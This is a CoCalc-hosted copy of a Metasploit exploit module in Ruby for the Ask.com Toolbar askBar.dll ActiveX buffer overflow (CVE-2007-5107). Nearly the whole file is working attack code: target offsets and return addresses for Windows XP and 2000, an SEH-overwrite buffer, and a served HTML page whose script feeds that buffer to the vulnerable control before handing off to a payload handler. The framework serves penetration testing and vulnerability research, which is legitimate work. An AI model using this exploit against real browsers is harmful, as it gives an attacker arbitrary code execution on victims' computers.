Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/ask_shortformat.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.

19
          An attacker may be able to execute arbitrary code by sending an overly

20
          long string to the "ShortFormat()" method in askbar.dll.

21
        },

22
        'License' => MSF_LICENSE,

23
        'Author' => [ 'MC' ],

24
        'References' => [

25
          [ 'CVE', '2007-5107' ],

26
          [ 'OSVDB', '37735' ]

27
        ],

28
        'DefaultOptions' => {

29
          'EXITFUNC' => 'process',

30
        },

31
        'Payload' => {

32
          'Space' => 800,

33
          'BadChars' => "\x00\x09\x0a\x0d'\\",

34
          'StackAdjustment' => -3500,

35
        },

36
        'Platform' => 'win',

37
        'Targets' => [

38
          [ 'Windows XP SP0/SP1 Pro English', { 'Offset' => 2876, 'Ret' => 0x71aa32ad } ],

39
          [ 'Windows 2000 Pro English ALL', { 'Offset' => 1716, 'Ret' => 0x75022ac4 } ],

40
        ],

41
        'DisclosureDate' => '2007-09-24',

42
        'DefaultTarget' => 0,

43
        'Notes' => {

44
          'Reliability' => UNKNOWN_RELIABILITY,

45
          'Stability' => UNKNOWN_STABILITY,

46
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

47
        }

48
      )

49
    )

50
  end

51


52
  def autofilter

53
    false

54
  end

55


56
  def check_dependencies

57
    use_zlib

58
  end

59


60
  def on_request_uri(cli, request)

61
    # Re-generate the payload

62
    return if ((p = regenerate_payload(cli)) == nil)

63


64
    # Randomize some things

65
    vname	= rand_text_alpha(rand(100) + 1)

66
    strname	= rand_text_alpha(rand(100) + 1)

67


68
    # Set the exploit buffer

69
    filler = rand_text_alpha(target['Offset'])

70
    seh = generate_seh_payload(target.ret)

71
    sploit = filler + seh + rand_text_alpha(payload.encoded.length)

72


73
    # Build out the message

74
    content = %Q|<html>

75
<object classid='clsid:5A074B2B-F830-49DE-A31B-5BB9D7F6B407' id='#{vname}'></object>

76
<script language='javascript'>

77
#{strname} = new String('#{sploit}');

78
#{vname}.ShortFormat = #{strname}

79
</script>

80
</html>

81
|

82


83
    print_status("Sending #{self.name}")

84


85
    # Transmit the response to the client

86
    send_response_html(cli, content)

87


88
    # Handle the payload

89
    handler(cli)

90
  end

91
end

92


93